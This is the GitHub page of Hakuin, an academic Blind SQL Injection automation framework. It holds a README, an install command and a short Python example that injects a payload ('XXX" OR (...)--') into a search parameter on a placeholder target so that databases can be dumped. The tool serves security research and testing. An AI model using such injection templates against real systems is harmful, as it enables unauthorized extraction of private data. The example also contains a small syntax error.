Skip to content
/ hakuin Public

A blazing fast and fully configurable Blind SQL Injection optimization and automation framework.

License

MIT license
138 stars 10 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

pruzko/hakuin

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

91 Commits
corpora
corpora
 
 
hakuin
hakuin
 
 
models
models
 
 
publications
publications
 
 
tests
tests
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
hk.py
hk.py
 
 
logo.png
logo.png
 
 
pyproject.toml
pyproject.toml
 
 

Repository files navigation

Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the extraction logic and allows users to easily and efficiently dump databases from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, statistical modeling, parallelism, ternary queries, and more.

Hakuin has been presented at esteemed academic and industrial conferences:

More information can be found in our paper and slides.

Installation

To install Hakuin, simply run:

pip3 install hakuin

Command Line Tool

Hakuin ships with an intuitive tool that offers most of Hakuin's features directly from the command line:

hk -h

Custom Scripting

Sometimes, BSQLI vulnerabilities are too tricky to exploit from the command line and require custom scripting. This is where Hakuin shines, allowing you to customize absolutely everything - the injection logic, the inference logic, and even the queries.

Here is a minimal example:

import asyncio
import aiohttp
from hakuin import Extractor, Requester

class SimpleRequester(Requester):
    async def request(self, query, ctx):
        payload = query.render(ctx)
        url = f'http://target.com/users?search=XXX" OR ({payload})--'
        async with aiohttp.request('GET', url) as resp:
            return resp.status == 200

async def main():
    requester = SimpleRequester():
    ext = Extractor(requester=requester, dbms='sqlite')
    data = await ext.extract_table_names()
    print(data)

asyncio.run(main())

Make sure to go through our tutorial.

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}

About

A blazing fast and fully configurable Blind SQL Injection optimization and automation framework.

Resources

Readme

License

MIT license
Activity

Stars

138 stars

Watchers

4 watching

Forks

10 forks
Report repository

Contributors 2

  •  
  •  

Languages